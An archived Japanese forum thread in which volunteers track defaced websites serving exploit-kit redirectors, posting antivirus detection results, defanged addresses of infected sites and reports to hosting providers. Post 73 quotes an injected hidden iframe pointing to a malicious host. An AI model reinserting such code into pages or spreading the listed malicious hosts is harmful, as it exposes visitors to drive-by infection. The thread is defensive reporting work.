【Gumblar/GENO】Web改竄ウイルス総合11【8080】

[表示 : 全て最新50 1-99 101- 201- 301- 401- 2ch.scのread.cgiへ]
Update time : 03/13 07:26 / Filesize : 172 KB / Number-of Response : 437
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 [2012/08/14(火) 12:41:21.97 BE:4628902289-PLT(31018).net]: 改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください＊＊＊
＊＊＊感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します＊＊＊

前スレ
【Gumblar/GENO】Web改竄ウイルス総合10【8080】
kohada.2ch.net/test/read.cgi/sec/1279692828/
54 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/18(木) 14:01:29.46 .net]: >>53
四度目
AntiVir JS/BlacoleRef.CZ.7 20130418
Commtouch JS/IFrame.RS.gen 20130418
DrWeb JS.IFrame.418 20130418
F-Prot JS/IFrame.RS.gen 20130418
Ikarus Trojan.JS.IFrame 20130418
McAfee JS/Blacole-Redirect.aa 20130418
Microsoft Trojan:JS/BlacoleRef.DD 20130418
Norman Blacole.TB 20130417

つーほーめる届いてなくても
いーかげん気付かないかなん
55 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/19(金) 23:48:47.87 .net]: >>54
五度目
AntiVir JS/BlacoleRef.CZ.7 20130419
BitDefender Trojan.Script.CDS 20130419
Commtouch JS/IFrame.RS.gen 20130419
DrWeb JS.IFrame.418 20130419
Emsisoft Trojan.Script.CDS (B) 20130419
F-Prot JS/IFrame.RS.gen 20130418
F-Secure Trojan.Script.CDS 20130419
GData Trojan.Script.CDS 20130419
Ikarus Trojan.JS.IFrame 20130419
McAfee JS/Blacole-Redirect.aa 20130419
McAfee-GW-Edition JS/Blacole-Redirect.aa 20130419
Microsoft Trojan:JS/BlacoleRef.DD 20130419
MicroWorld-eScan Trojan.Script.CDS 20130419
Norman Blacole.TB 20130419
nProtect Trojan.Script.CDS 20130419

もうﾍﾞﾝﾀﾞｰに送る気力がにゃい
56 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/20(土) 00:41:15.72 .net]: こりもころころ変わるっぽい＞中間Script
Sophos Troj/ExpJS-II 20130419
55ひっくるめて送った＞ﾍﾞﾝﾀﾞｰ
57 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/22(月) 01:37:02.84 .net]: >>55
七度目
Detection ratio: 2 / 46
Analysis date: 2013-04-21 16:31:34 UTC
Antivirus Result Update
McAfee JS/Exploit-Blacole.ht 20130421
Norman Blacole.TH 20130421

六度目は>>47 >>49とおなじものですた
58 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/22(月) 02:54:43.86 .net]: 中間Script >>57

久しぶりにひげおじさん登場
Detection ratio: 18 / 46
Analysis date: 2013-04-21 17:25:00 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.7 20130421
BitDefender Trojan.JS.Agent.IYT 20130421
Commtouch JS/IFrame.RS.gen 20130420
Comodo UnclassifiedMalware 20130421
DrWeb JS.IFrame.418 20130421
Emsisoft Trojan.JS.Agent.IYT (B) 20130421
F-Prot JS/IFrame.RS.gen 20130420
F-Secure Trojan.JS.Agent.IYT 20130421
Fortinet JS/Agent.GWA!tr.dldr 20130421
GData Trojan.JS.Agent.IYT 20130421
Ikarus Trojan.JS.IFrame 20130421
Kaspersky Trojan-Downloader.JS.Agent.gwa 20130421
McAfee JS/Exploit-Blacole.eu 20130421
McAfee-GW-Edition JS/Exploit-Blacole.eu 20130421
Microsoft Trojan:JS/BlacoleRef.DD 20130421
Norman Blacole.TB 20130421
nProtect Trojan.JS.Agent.IYT 20130421
TrendMicro-HouseCall TROJ_GEN.F47V0420 20130421

単純化しちゃったのがまた出た
Detection ratio: 0 / 46
Analysis date: 2013-04-21 17:15:56 UTC

ねもい
59 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/22(月) 03:12:33.02 .net]: ( ﾟ∀ﾟ)ｱﾊﾊ八八ﾉヽﾉヽﾉヽﾉ＼ / ＼/ ＼
スパムとかのドメインがあったもより
まかひには送れない
60 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/23(火) 14:26:12.52 .net]: >>57
八回目…
Detection ratio: 6 / 46
Analysis date: 2013-04-23 04:15:16 UTC
Antivirus Result Update
AntiVir JS/BlacoleRef.CZ.8 20130423
DrWeb Exploit.BlackHole.182 20130423
McAfee JS/Exploit-Blacole.ht 20130423
NANO-Antivirus Trojan.Script.IFrame.bohxwi 20130423
Norman Blacole.TH 20130422
VIPRE Trojan.JS.Obfuscator.aa (v) 20130423
61 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/23(火) 21:09:58.48 .net]: > Dear *****,
>
> Thank you for your submission.
> The detection for this threat will be included in our next signature update.
>
> Regards,
>
> ESET Malware Response Team

いつもごめんよぉー
肝心の大ボス捕まえられなくて
62 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/25(木) 01:32:09.03 .net]: これまで蜜壷状態だったとこが正常になった模様です。
お疲れ様でした。

定点観測おはり
63 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/04/29(月) 03:13:32.91 BE:1572252-BRZ(10111).net]: こんな夜中にGMOの中の人が受理してくれました＞インシデント
ゴールデンなウィークですがお疲れ様です。
ありがとうございます。
この場を借りてお礼申し上げます。
64 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/05(日) 09:34:58.21 .net]: 一回目
AntiVir JS/BlacoleRef.CZ.12 20130503
Avast JS:Decode-ADH [Trj] 20130504
GData JS:Decode-ADH 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504

二回目
AntiVir JS/BlacoleRef.CZ.12 20130504
Avast JS:Decode-ADH [Trj] 20130504
BitDefender Trojan.JS.Iframe.DDQ 20130504
Emsisoft Trojan.JS.Iframe.DDQ (B) 20130504
F-Secure Trojan.JS.Iframe.DDQ 20130504
GData Trojan.JS.Iframe.DDQ 20130504
McAfee JS/Exploit-Blacole.ht 20130504
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504
MicroWorld-eScan Trojan.JS.Iframe.DDQ 20130504
nProtect Trojan.JS.Iframe.DDQ 20130504

三回目
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130504

Script更新して殆どのベンダー半日もたんかった
てーてんかんそくなぬか
サイトの対応は早くても明後日、火曜日以降になるんだろーな
65 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/06(月) 04:35:47.16 .net]: >>64
> 三回目
増えた
BitDefender Trojan.JS.Iframe.DDT 20130505
Comodo UnclassifiedMalware 20130505
Emsisoft Trojan.JS.Iframe.DDT (B) 20130505
F-Secure Trojan.JS.Iframe.DDT 20130505
GData Trojan.JS.Iframe.DDT 20130505
McAfee JS/Exploit-Blacole.ht 20130505
McAfee-GW-Edition JS/Exploit-Blacole.ht 20130505
MicroWorld-eScan Trojan.JS.Iframe.DDT 20130505
nProtect Trojan.JS.Iframe.DDT 20130505
TrendMicro-HouseCall TROJ_GEN.F47V0504 20130505
66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/05/06(月) 11:54:43.37 .net]: 覚音山　西徳寺
www●saitoku●net/
iframe name=Twitter scrolling=auto･･･

競馬の予想屋
keibaky●com
<script>try{1-prototype;}catch･･･

two2readblog●com
>不正なソフトウェアには 550 trojan(s) など
ｗｗｗｗｗｗｗｗ
67 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/06(月) 17:07:37.83 .net]: 上二つGMO、ばりゅどめにつーほー
68 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/07(火) 22:48:30.83 .net]: 別件ばぅぁー

ひげおぢさん

> Hello,
>
> New malicious software was found in the attached file. Its detection will be included in the next update.
>
> All these 4 files will be detected as Trojan-Downloader.JS.Iframe.ddg
>
> Thank you for your help.

>>64-65
なおたヽ(´ー｀)ノ
69 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/09(木) 00:37:30.24 .net]: RedKit Exploit Kit Redirector Site 某所のJSファイル

AntiVir 　 HTML/TwitScroll.B 　 20130508
Avast 　 JS:Iframe-AML [Trj] 　 20130508
AVG 　 HTML/Framer 　 20130508
BitDefender 　 Trojan.Iframe.CBN 　 20130508
Commtouch 　 IFrame.gen 　 20130508
Comodo 　 TrojWare.JS.Iframe.FK 　 20130508
Emsisoft 　 Trojan.Iframe.CBN (B) 　 20130508
ESET-NOD32 　 JS/Iframe.HH 　 20130508
F-Prot 　 IFrame.gen 　 20130508
F-Secure 　 Trojan.Iframe.CBN 　 20130508
Fortinet 　 JS/Iframe.HH!tr 　 20130508
GData 　 Trojan.Iframe.CBN 　 20130508
Ikarus 　 Exploit.HTML.IframeRef 　 20130508
Kaspersky 　 HEUR:Trojan.Script.Generic 　 20130508
McAfee 　 JS/IFrame.gen.j 　 20130508
McAfee-GW-Edition 　 JS/IFrame.gen.j 　 20130508
Microsoft 　 Exploit:HTML/IframeRef.DM 　 20130508
MicroWorld-eScan 　 Trojan.Iframe.CBN 　 20130508
NANO-Antivirus 　 Trojan.Html.TwitScroll.bklyhq 　 20130508
Norman 　 Iframe.UW 　 20130508
nProtect 　 Trojan.Iframe.CBN 　 20130508
PCTools 　 Trojan.Webkit 　 20130508
Sophos 　 Troj/Iframe-JG 　 20130508
Symantec 　 Trojan.Webkit!html 　 20130508
VIPRE 　 Malware.JS.Generic (JS) 　 20130508

おしんさん、がむばって
70 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/11(土) 03:27:16.82 .net]: 改竄サイトをホスティングにつーほーしてるなまかへ

ドメインがブロックされることが多いので、めんどいけどフォームからもつーほーしてね
71 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/12(日) 04:06:17.40 .net]: BlackHole Exploit Kit Redirector Siteの新種のScript

File type:　HTML
Detection ratio:　 1 / 46
Analysis date:　 2013-05-11 18:18:17 UTC
Antivirus 　 Result 　 Update
Norman 　 BlacoleRef.BA 　 20130511

んで、飛び先のひとつ

File type:　HTML
Detection ratio:　 6 / 46
Analysis date:　 2013-05-11 18:39:21 UTC
Antivirus 　 Result 　 Update
BitDefender 　 Trojan.Html.Fakealert.P 　 20130511
Emsisoft 　 Trojan.Html.Fakealert.P (B) 　 20130511
F-Secure 　 Trojan.Html.Fakealert.P 　 20130511
GData 　 Trojan.Html.Fakealert.P 　 20130511
MicroWorld-eScan 　 Trojan.Html.Fakealert.P 　 20130511
nProtect 　 Trojan.Html.Fakealert.P 　 20130510

ESETもどきに連れてかれたん
72 名前：名無しさん＠お腹いっぱい。 [2013/05/14(火) 15:02:24.37 .net]: apple-hikkoshi●co●jp/
403、404が改竄されとるんｗ
ishigo●sytes●net

※電凸済み
73 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/05/14(火) 15:43:19.30 .net]: >>72 コード
＜!-- . --＞＜iframe width="1px" height="1px" src="ｈｔｔｐ：／／ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ＞＜/iframe＞＜!-- . --＞
74 名前：名無しさん＠お腹いっぱい。 [2013/05/14(火) 17:50:17.38 .net]: >>72
修正を確認すた…
75 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/14(火) 23:29:00.06 .net]: お疲れ様です。
某公益社団法人のサイトがやられていますた。＞BlackHole Exploit Kit

おしんにめる済み
76 名前：コテハン ◆8080adndqg mailto:sage [2013/05/14(火) 23:51:58.22 .net]: kusuo-o●net
ど　う　し　て　こ　う　な　っ　た　？
c o m m o n / j s / s c r i p t . j s
77 名前：名無しさん＠お腹いっぱい。 [2013/05/15(水) 00:20:03.95 .net]: gakunavi●net
78 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/15(水) 03:33:39.32 .net]: >>76-77
どーん

>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。

>77
2013-05-07 08:28:11 UTC （日本時間 : 2013/5/07 17:28:11）にはVirusTotalに投げられてますた。

あきた寝る
79 名前：コテハン ◆8080adndqg mailto:sage [2013/05/15(水) 13:52:46.96 .net]: >>78
乙カレー丼
>>76はミンスのＨＰに投げてみた
80 名前：コテハン ◆8080adndqg mailto:sage [2013/05/15(水) 18:08:56.74 .net]: 210●148●117●65/
色々な意味でｽｹﾞｪｗ
81 名前：コテハン ◆8080adndqg mailto:sage [2013/05/15(水) 21:28:52.01 .net]: >>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。

kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。

見に行ったらメンテ中だた...
82 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/15(水) 23:35:51.92 .net]: >>80
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー

>>81
他のページやjsは生きてるお　ﾌﾐﾀﾞｲかも
再要請すた。
83 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/15(水) 23:48:14.51 .net]: > 再要請
さくらにつーほ >>6
84 名前：名無しさん＠お腹いっぱい。 [2013/05/16(木) 00:23:25.72 .net]: >>82 >>76
ｱｰｯ　　　orz
85 名前：コテハン ◆8080adndqg mailto:sage [2013/05/16(木) 00:26:17.37 .net]: コテ忘れるし、sageてないし…　orz
86 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/16(木) 21:47:07.18 .net]: >>76
さくら対応

>>80
御本人様から対応のお返事頂きました

以上確認しました。
皆様お疲れ様です。 m(_ _)m
87 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/23(木) 02:59:40.68 .net]: BlackHole Exploit Kit Redirector
検体2通、いくつか宛先不通になってた

1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........

薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522
88 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/23(木) 03:06:22.26 .net]: JaneViewの設定だお＞[TAB]
>87やりなおし
File size:　50.3 KB ( 51517 bytes )
File name:　pl.txt
File type:　HTML
Detection ratio:　 2 / 47
Analysis date:　 2013-05-22 16:21:42 UTC
Antivirus 　 Result 　 Update
Avast 　 HTML:Script-inf 　 20130522
GData 　 HTML:Script-inf 　 20130522

んで感染サイトのスクリプトは
File size:　8.4 KB ( 8624 bytes )
File name:　index.html
File type:　HTML
Detection ratio:　 4 / 47
Analysis date:　 2013-05-22 15:50:35 UTC
Antivirus 　 Result 　 Update
Fortinet 　 JS/Iframe.DDG!tr.dldr 　 20130522
Kaspersky 　 Trojan-Downloader.JS.Iframe.ddr 　 20130522
McAfee 　 JS/Exploit-Blacole.ht 　 20130522
NANO-Antivirus 　 Trojan.Script.Expack.bqgmvl

中間スクリプト
File size:　241 bytes ( 241 bytes )
File type:　HTML
Detection ratio:　 2 / 47
Analysis date:　 2013-05-22 16:12:15 UTC
Antivirus 　 Result 　 Update
McAfee 　 Exploit-Rekit.f 　 20130522
Sophos 　 Troj/ExpJS-II 　 20130522
89 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/25(土) 03:41:39.54 .net]: ァッｰ

追っかけてたら、辿り付いた
www.google.com/safebrowsing/diagnostic?site=ime.nu

クッションサイトだからかな
90 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/27(月) 00:35:42.60 .net]: RedKit Exploit Kit Redirector

ランダムな中間スクリプト
File type:　HTML
Detection ratio:　 3 / 47
Analysis date:　 2013-05-26 14:39:38 UTC
McAfee 　 JS/Exploit-Blacole.lt 　 20130526
McAfee-GW-Edition 　 JS/Exploit-Blacole.lt 　 20130526
Sophos 　 Troj/ExpJS-II 　 20130522

まかひとそふぉぉぉぉすががむばってるん

相変わらずこちらの環境ではﾌﾞﾂ落とせないままぽ
91 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/29(水) 13:33:43.54 .net]: memo

g01pack exploit kit

エフセキュアブログ : g01pack
blog.f-secure.jp/tag/g01pack
92 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/29(水) 13:35:56.00 .net]: >>91
現在の最新情報
エフセキュアブログ : g01packがシェア拡大の兆し
blog.f-secure.jp/archives/50701223.html
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/05/29(水) 22:04:56.53 .net]: www●muse●dti●ne●jp/~ohyes/
94 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/30(木) 01:50:59.74 .net]: >>93
お疲れ様です。
夢列車につーほーしますた。
95 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/31(金) 00:40:02.78 .net]: まだ直ってないようですが、
恐らくひげおぢさんがﾋﾟｺｰﾝしたら対応されるかも>93

んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか
96 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/05/31(金) 13:55:45.14 .net]: >>95
MD5: 444bcb3a3fcf8389296c49467f27e1d6
docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf
97 名前：名無しさん＠お腹いっぱい。 [2013/06/02(日) 11:58:43.02 .net]: www●trajal●net/k-b●html
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/
98 名前：名無しさん＠お腹いっぱい。 [2013/06/02(日) 12:18:40.44 .net]: 松浦とみよし市議会議員
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。
99 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/03(月) 07:57:15.43 .net]: >>97-98
お疲れ様です。
つーほーしました。

以前にもつーほーしたのがあったやうな
つーほー漏れかなん。。。orz...........
100 名前：名無しさん＠お腹いっぱい。 [2013/06/04(火) 23:11:04.06 .net]: 申告しても対処しないサイト
www●yanagita-kk●co●jp/
www10●ocn●ne●jp/~kuushuu/ussbsindex●html
www●arpak-cdc●co●jp/
w01●tp1●jp/~a541677231/
nanaplan●jp/kako_kenngakusai●html
ir06●com/
www●garage-yamato●com/
www●fp-kazuna●com/insu/
www1●hinocatv●ne●jp/baba/
harakirievent●toypark●in/
101 名前：名無しさん＠お腹いっぱい。 [2013/06/04(火) 23:13:15.28 .net]: archivo-semiotica●com/
www●dorf●co●jp/access●html
www●utsunomiya-es●com/
mado-works●com/staff●html
www●86919●com/
xn--n8jxcwb2fra8229bokzg●com/
angelstone●co●jp/
bbs-beppin●com
www●presen●co●jp/SERV●html
harmony8●com
g2g2●jp/
caiquesarepeopletoo●com/
cairo123●com/
www●antwarp●jp/souvenir/monthly_select/
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/06(木) 00:02:14.13 .net]: >>100乙です
②まで上流に電話連絡済（対応する旨の事）
残件8

>>101乙です
残件14
103 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/06(木) 18:43:47.73 .net]: >>102
>>102
④まで済
尚、④に関しては、HI BIT 経由の情報として
警視庁サイバー犯罪対策課がHPの所有者に連絡済とのこと
104 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/06(木) 18:51:12.95 .net]: >>103
残権に関しては、警視庁のお手並み拝見ということで撤収
105 名前：名無しさん＠お腹いっぱい。 [2013/06/06(木) 21:11:02.86 .net]: 何ヶ月も放置する駄目なOCNのユーザが大量感染
OCNはあてにならないので直接ユーザのメルアドに警告中。
メルアドがないのを助けてください
www1●ocn●ne●jp/~ganja/
www1●ocn●ne●jp/~oohata/
www1●ocn●ne●jp/~takano8/
www11●ocn●ne●jp/~uten/
www12●ocn●ne●jp/~kaido/rw/
106 名前：名無しさん＠お腹いっぱい。 [2013/06/06(木) 21:33:28.35 .net]: www14●ocn●ne●jp/~yu4127/
www15●ocn●ne●jp/~nakanoah/
www15●ocn●ne●jp/~toshikaz/
www15●ocn●ne●jp/~vento/
www17●ocn●ne●jp/~skynet/
www18●ocn●ne●jp/~answer/
www18●ocn●ne●jp/~cos/
107 名前：名無しさん＠お腹いっぱい。 [2013/06/06(木) 23:26:08.97 .net]: ４０件はHPのメルアドに警告完了
wwww2●ocn●ne●jp/~esi/
www18●ocn●ne●jp/~myouga/
www2●ocn●ne●jp/~littleb/
www2●ocn●ne●jp/~seafood/
www2●ocn●ne●jp/~skbld/
www2●ocn●ne●jp/~suwan/
www3●ocn●ne●jp/~charinko/
www3●ocn●ne●jp/~nino38/
108 名前：名無しさん＠お腹いっぱい。 [2013/06/06(木) 23:30:15.76 .net]: www4●ocn●ne●jp/~htgifu/
www8●ocn●ne●jp/~bito/
www8●ocn●ne●jp/~gzwave/
www8●ocn●ne●jp/~k-chico/
www9●ocn●ne●jp/~alingo/
109 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/07(金) 05:56:19.42 .net]: 皆様お疲れ様です。

>>105-108
以前の分でおしんにめる届いてたっぽいので纏めてつーほ
フォームどーすべ

>>104
なので診ませんですた。>>100-101

目がｲﾀｲのでしばしﾘﾀｲｱ
さいとあどばいざがｇｄｇｄ。。。orz............
110 名前：オルティス・ジャパン mailto:sage [2013/06/07(金) 18:11:49.68 .net]: >>109
お大事に

>>105-108
連絡完了

OCNの中の人へ
対応窓口を誰にも分かるよう明確に、対応フローをしっかりとね
ついでに↓も見ておくといいかも
jpサート www.jpcert.or.jp/
Web サイト改ざんに関する注意喚起
www.jpcert.or.jp/at/2013/at130027.html
IPA https://www.ipa.go.jp/
2013年6月の呼びかけ「ウェブサイトが改ざんされないように対策を！」を公開しました。
https://www.ipa.go.jp/security/txt/2013/06outline.html
「ガンブラー」事件に匹敵するWeb改ざん報告、IPAが対策徹底を呼び掛け
www.itmedia.co.jp/enterprise/articles/1306/04/news108.html
[データ] 「Webサイト改ざん」が急増、「ガンブラー」流行時に匹敵、IPAまとめ
bizmash.jp/articles/45655.html
国内サイト20件以上で、政治的な改ざんが発生 - 扇動しており規模拡大に警戒を
www.security-next.com/040525
国内Webサイト改ざん事例続報：攻撃手法の詳細と得られる対策の教訓
blog.trendmicro.co.jp/archives/7367
国内のWebサイトの改ざんが拡大中 | トレンドマイクロセキュリティブログ ...
blog.trendmicro.co.jp/archives/3317
日本のWebサイト狙った改ざん攻撃に注意 - トレンドマイクロ
news.mynavi.jp/news/2013/05/31/282/index.html
国内Webサイト改ざん事例、攻撃手法の詳細が判明 ― トレンドマイクロ
is702.jp/news/1369/partner/101_g/
111 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/08(土) 05:54:44.41 .net]: >>105-108 知ってるとこあって驚いた。どうやってこんなに大量に感染サイトを見つけてくるんですか？
112 名前：名無しさん＠お腹いっぱい。 [2013/06/08(土) 11:25:10.36 .net]: ブラウザがブロックする元の情報となっている
stopbadware　です。
113 名前：オルティス・ジャパン mailto:sage [2013/06/08(土) 13:44:30.41 .net]: >>110
①のganjaに電話で確認してみました
OCNからの連絡はないとのこと
月曜以降に>>100の②に連絡した窓口に
お財布と相談しながら、もしかしたら連絡するかも
114 名前：名無しさん＠お腹いっぱい。 [2013/06/09(日) 10:28:15.23 .net]: ISPはOCNでだらしのないAbuseだし
何度もユーザにメールしても放置。

pacific-ocean●co●jp/
115 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/09(日) 15:54:22.38 .net]: あいぴーあどれすもぁぅぁぅ
116 名前：名無しさん＠お腹いっぱい。 [2013/06/09(日) 19:23:44.92 .net]: icweb●jp/~mantashokudo/
www●fp-kazuna●com/insu/
showa-ts●co●jp/
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
117 名前：名無しさん＠お腹いっぱい。 [2013/06/09(日) 19:27:11.63 .net]: www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
118 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/10(月) 06:00:10.72 .net]: おぱようごぜぇやす

くこまでメルとかしまひた

補足
>>116にもあいぴーあどれすぁぅぁぅがありますた
んで、いちばんすた、外部さいとがぁぅぁぅ　こりもつーほ
>>117のいちばんすた、壊れてるけどAviraがぴこーん
119 名前：コテハン ◆8080adndqg mailto:sage [2013/06/10(月) 13:48:32.30 .net]: 今北三ｇ・・・　orz
120 名前：オルティス・ジャパン mailto:sage [2013/06/10(月) 18:01:56.25 .net]: OCNはこのスレを巡回リストに入れたとの事なので自助努力して貰いましょう
つまり、このスレのOCNの改ざんサイトは、OCNが自主的に対応するということです

あんまり頑張り過ぎると禿げたり目が痛くなるので少しは楽をしましょう＞＞all

>>110
追加
5月末に急増した改ざん、「IISサーバ」が標的か - 「Gumblar」と類似点
www.security-next.com/040688
121 名前：オルティス・ジャパン mailto:sage [2013/06/10(月) 19:42:55.95 .net]: とはいえ>>113の>>110
①のganja ← これはHPの所有者に電話したので閉鎖されている様ですが
②oohataは対応されていません
おそらくOCNは口先だけなのでしょうね

なので、警視庁サイバー犯罪対策課の方
お話した通り逮捕しちゃってください
122 名前：名無しさん＠お腹いっぱい。 [2013/06/10(月) 21:58:40.03 .net]: 申告したものも真面に対応できないOCNが。。。
デタラメでしょうね。
昔に、出会い系サイトにたいし警察から警告を受けたホスティング屋が
対応が遅かったりしなかったとして幇助で捕まったことがありましたが
本当に逮捕してくれるといいですね。OCNだと良い刺激になるでしょう
123 名前：名無しさん＠お腹いっぱい。 [2013/06/10(月) 22:05:06.38 .net]: そういえばOCNのメアドがわかる２９サイトには、直接警告しましたが
５０％は２日で対処している。OCNの案内は対処の仕方の案内が駄目なんでしょうね。
期限も切って表示停止にもできないチキンがOCNということでしょう
124 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/11(火) 00:32:19.70 .net]: >>105
>>106
別経由で連絡先わかったとこに電凸。
ほとんど皆さんからの警告も、OCNからの警告も気づいてないです。
むしろ、こっちが疑われて「この電話番号を警察に言う」とか逆切れされた（泣）
やっぱりおしんに元から強制排除してもらうのがいいかもしんない。
125 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/11(火) 04:09:27.00 .net]: > システムメンテナンス作業に伴うサービス停止のお知らせ
>
> ただ今、システムメンテナンス中のため、
> 弊社ホームページをご利用いただけません。
>
> ご不便おかけしますが、しばらくお待ちください。

ｶﾞ━━━━━━∑(ﾟдﾟlll)━━━━━━ﾝ
126 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/11(火) 04:22:07.85 .net]: んー、だめぽ

>>124
お疲れ様ですお疲れ様です。

それとなくJPCERTやIPAにこのスレのこと伝えてあるので……
127 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/11(火) 08:01:38.68 .net]: >>117のいちばんすた、Script追加されてた
ゆーどーさきこちらの環境だと>>96
128 名前：/名無しさん[1-30] ◆.htmlint.U mailto:sage [2013/06/11(火) 16:38:08.62 .net]: 復帰カキコ

頭隠して尻隠さずってのが某所にあるぽ
ﾌﾐﾀﾞｲかなん
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2013/06/11(火) 16:50:05.48 .net]: operation name:hyaena
engawa.2ch.net/test/read.cgi/isp/1370760773/
130 名前：名無しさん＠お腹いっぱい。 [2013/06/11(火) 21:48:45.60 .net]: いやービックリ！あのOCNが本当に止めましたよ。
それでは、OCNさん以下も止めてください
www1●ocn●ne●jp/~niryo/
www32●ocn●ne●jp/~sirotaya/
www4●ocn●ne●jp/~music-wa/
www6●ocn●ne●jp/~guuska/rink●htm
www6●ocn●ne●jp/~sumika/
www8●ocn●ne●jp/~waga/
www9●ocn●ne●jp/~tada1ppo/06aisatukanben●htm
www17●ocn●ne●jp/~skynet/
131 名前：名無しさん＠お腹いっぱい。 [2013/06/11(火) 21:50:10.28 .net]: www1●ocn●ne●jp/~agraph/
www1●ocn●ne●jp/~pageone/
www10●ocn●ne●jp/~akachanf/
www11●ocn●ne●jp/~gen0929/
www13●ocn●ne●jp/~yaesu/
www15●ocn●ne●jp/~yktk/
www17●ocn●ne●jp/~omura/
132 名前：名無しさん＠お腹いっぱい。 [2013/06/11(火) 21:51:12.38 .net]: www18●ocn●ne●jp/~b-miz/
www2●ocn●ne●jp/~kyowawin/
www2●ocn●ne●jp/~stkr/
www4●ocn●ne●jp/~sakura77/
www8●ocn●ne●jp/~daitou/

以下はリダイレクトページ
www17●ocn●ne●jp/~addtech/
www17●ocn●ne●jp/~kinsicho/
